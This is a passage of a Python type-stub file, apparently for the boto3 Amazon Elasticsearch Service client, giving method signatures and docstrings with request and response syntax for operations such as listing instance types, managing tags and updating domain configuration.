def list_elasticsearch_instance_types(self, ElasticsearchVersion: str, DomainName: str = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
List all Elasticsearch instance types that are supported for given ElasticsearchVersion
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListElasticsearchInstanceTypes>`_
**Request Syntax**
::
response = client.list_elasticsearch_instance_types(
ElasticsearchVersion='string',
DomainName='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ElasticsearchInstanceTypes': [
'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for the parameters returned by `` ListElasticsearchInstanceTypes `` operation.
- **ElasticsearchInstanceTypes** *(list) --*
List of instance types supported by Amazon Elasticsearch service for given `` ElasticsearchVersion ``
- *(string) --*
- **NextToken** *(string) --*
In case if there are more results available NextToken would be present, make further request to the same API with received NextToken to paginate remaining results.
:type ElasticsearchVersion: string
:param ElasticsearchVersion: **[REQUIRED]**
Version of Elasticsearch for which list of supported elasticsearch instance types are needed.
:type DomainName: string
:param DomainName:
DomainName represents the name of the Domain that we are trying to modify. This should be present only if we are querying for list of available Elasticsearch instance types when modifying existing domain.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. Value provided must be greater than 30 else it wont be honored.
:type NextToken: string
:param NextToken:
NextToken should be sent in case if earlier API call produced result containing NextToken. It is used for pagination.
:rtype: dict
:returns:
"""
pass
def list_elasticsearch_versions(self, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
List all supported Elasticsearch versions
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListElasticsearchVersions>`_
**Request Syntax**
::
response = client.list_elasticsearch_versions(
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ElasticsearchVersions': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Container for the parameters for response received from `` ListElasticsearchVersions `` operation.
- **ElasticsearchVersions** *(list) --*
List of supported elastic search versions.
- *(string) --*
- **NextToken** *(string) --*
Paginated APIs accepts NextToken input to returns next page results and provides a NextToken output in the response which can be used by the client to retrieve more results.
:type MaxResults: integer
:param MaxResults:
Set this value to limit the number of results returned. Value provided must be greater than 10 else it wont be honored.
:type NextToken: string
:param NextToken:
Paginated APIs accepts NextToken input to returns next page results and provides a NextToken output in the response which can be used by the client to retrieve more results.
:rtype: dict
:returns:
"""
pass
def list_tags(self, ARN: str) -> Dict:
"""
Returns all tags for the given Elasticsearch domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/ListTags>`_
**Request Syntax**
::
response = client.list_tags(
ARN='string'
)
**Response Syntax**
::
{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
The result of a ``ListTags`` operation. Contains tags for all requested Elasticsearch domains.
- **TagList** *(list) --*
List of ``Tag`` for the requested Elasticsearch domain.
- *(dict) --*
Specifies a key value pair for a resource tag.
- **Key** *(string) --*
Specifies the ``TagKey`` , the name of the tag. Tag keys must be unique for the Elasticsearch domain to which they are attached.
- **Value** *(string) --*
Specifies the ``TagValue`` , the value assigned to the corresponding tag key. Tag values can be null and do not have to be unique in a tag set. For example, you can have a key value pair in a tag set of ``project : Trinity`` and ``cost-center : Trinity``
:type ARN: string
:param ARN: **[REQUIRED]**
Specify the ``ARN`` for the Elasticsearch domain to which the tags are attached that you want to view.
:rtype: dict
:returns:
"""
pass
def purchase_reserved_elasticsearch_instance_offering(self, ReservedElasticsearchInstanceOfferingId: str, ReservationName: str, InstanceCount: int = None) -> Dict:
"""
Allows you to purchase reserved Elasticsearch instances.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/PurchaseReservedElasticsearchInstanceOffering>`_
**Request Syntax**
::
response = client.purchase_reserved_elasticsearch_instance_offering(
ReservedElasticsearchInstanceOfferingId='string',
ReservationName='string',
InstanceCount=123
)
**Response Syntax**
::
{
'ReservedElasticsearchInstanceId': 'string',
'ReservationName': 'string'
}
**Response Structure**
- *(dict) --*
Represents the output of a ``PurchaseReservedElasticsearchInstanceOffering`` operation.
- **ReservedElasticsearchInstanceId** *(string) --*
Details of the reserved Elasticsearch instance which was purchased.
- **ReservationName** *(string) --*
The customer-specified identifier used to track this reservation.
:type ReservedElasticsearchInstanceOfferingId: string
:param ReservedElasticsearchInstanceOfferingId: **[REQUIRED]**
The ID of the reserved Elasticsearch instance offering to purchase.
:type ReservationName: string
:param ReservationName: **[REQUIRED]**
A customer-specified identifier to track this reservation.
:type InstanceCount: integer
:param InstanceCount:
The number of Elasticsearch instances to reserve.
:rtype: dict
:returns:
"""
pass
def remove_tags(self, ARN: str, TagKeys: List):
"""
Removes the specified set of tags from the specified Elasticsearch domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/RemoveTags>`_
**Request Syntax**
::
response = client.remove_tags(
ARN='string',
TagKeys=[
'string',
]
)
:type ARN: string
:param ARN: **[REQUIRED]**
Specifies the ``ARN`` for the Elasticsearch domain from which you want to delete the specified tags.
:type TagKeys: list
:param TagKeys: **[REQUIRED]**
Specifies the ``TagKey`` list which you want to remove from the Elasticsearch domain.
- *(string) --*
:returns: None
"""
pass
def start_elasticsearch_service_software_update(self, DomainName: str) -> Dict:
"""
Schedules a service software update for an Amazon ES domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/StartElasticsearchServiceSoftwareUpdate>`_
**Request Syntax**
::
response = client.start_elasticsearch_service_software_update(
DomainName='string'
)
**Response Syntax**
::
{
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
The result of a ``StartElasticsearchServiceSoftwareUpdate`` operation. Contains the status of the update.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch service software update.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the domain that you want to update to the latest service software.
:rtype: dict
:returns:
"""
pass
def update_elasticsearch_domain_config(self, DomainName: str, ElasticsearchClusterConfig: Dict = None, EBSOptions: Dict = None, SnapshotOptions: Dict = None, VPCOptions: Dict = None, CognitoOptions: Dict = None, AdvancedOptions: Dict = None, AccessPolicies: str = None, LogPublishingOptions: Dict = None) -> Dict:
"""
Modifies the cluster configuration of the specified Elasticsearch domain, setting as setting the instance type and the number of instances.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/UpdateElasticsearchDomainConfig>`_
**Request Syntax**
::
response = client.update_elasticsearch_domain_config(
DomainName='string',
ElasticsearchClusterConfig={
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
EBSOptions={
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
SnapshotOptions={
'AutomatedSnapshotStartHour': 123
},
VPCOptions={
'SubnetIds': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
CognitoOptions={
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
AdvancedOptions={
'string': 'string'
},
AccessPolicies='string',
LogPublishingOptions={
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
}
)
**Response Syntax**
::
{
'DomainConfig': {
'ElasticsearchVersion': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'ElasticsearchClusterConfig': {
'Options': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EBSOptions': {
'Options': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AccessPolicies': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'SnapshotOptions': {
'Options': {
'AutomatedSnapshotStartHour': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'VPCOptions': {
'Options': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'CognitoOptions': {
'Options': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EncryptionAtRestOptions': {
'Options': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'NodeToNodeEncryptionOptions': {
'Options': {
'Enabled': True|False
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AdvancedOptions': {
'Options': {
'string': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'LogPublishingOptions': {
'Options': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
The result of an ``UpdateElasticsearchDomain`` request. Contains the status of the Elasticsearch domain being updated.
- **DomainConfig** *(dict) --*
The status of the updated Elasticsearch domain.
- **ElasticsearchVersion** *(dict) --*
String of format X.Y to specify version for the Elasticsearch domain.
- **Options** *(string) --*
Specifies the Elasticsearch version for the specified Elasticsearch domain.
- **Status** *(dict) --*
Specifies the status of the Elasticsearch version options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **ElasticsearchClusterConfig** *(dict) --*
Specifies the ``ElasticsearchClusterConfig`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the cluster configuration for the specified Elasticsearch domain.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **Status** *(dict) --*
Specifies the status of the configuration for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EBSOptions** *(dict) --*
Specifies the ``EBSOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the EBS options for the specified Elasticsearch domain.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **Status** *(dict) --*
Specifies the status of the EBS options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AccessPolicies** *(dict) --*
IAM access policy as a JSON-formatted string.
- **Options** *(string) --*
The access policy configured for the Elasticsearch domain. Access policies may be resource-based, IP-based, or IAM-based. See `Configuring Access Policies <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-access-policies>`__ for more information.
- **Status** *(dict) --*
The status of the access policy for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **SnapshotOptions** *(dict) --*
Specifies the ``SnapshotOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the daily snapshot options specified for the Elasticsearch domain.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **Status** *(dict) --*
Specifies the status of a daily automated snapshot.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **Options** *(dict) --*
Specifies the VPC options for the specified Elasticsearch domain.
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **Status** *(dict) --*
Specifies the status of the VPC options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Options** *(dict) --*
Specifies the Cognito options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **Status** *(dict) --*
Specifies the status of the Cognito options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the ``EncryptionAtRestOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the Encryption At Rest options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **Status** *(dict) --*
Specifies the status of the Encryption At Rest options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the ``NodeToNodeEncryptionOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the node-to-node encryption options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **Status** *(dict) --*
Specifies the status of the node-to-node encryption options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AdvancedOptions** *(dict) --*
Specifies the ``AdvancedOptions`` for the domain. See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- **Options** *(dict) --*
Specifies the status of advanced options for the specified Elasticsearch domain.
- *(string) --*
- *(string) --*
- **Status** *(dict) --*
Specifies the status of ``OptionStatus`` for advanced options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- **Options** *(dict) --*
The log publishing options configured for the Elasticsearch domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **Status** *(dict) --*
The status of the log publishing options for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you are updating.
:type ElasticsearchClusterConfig: dict
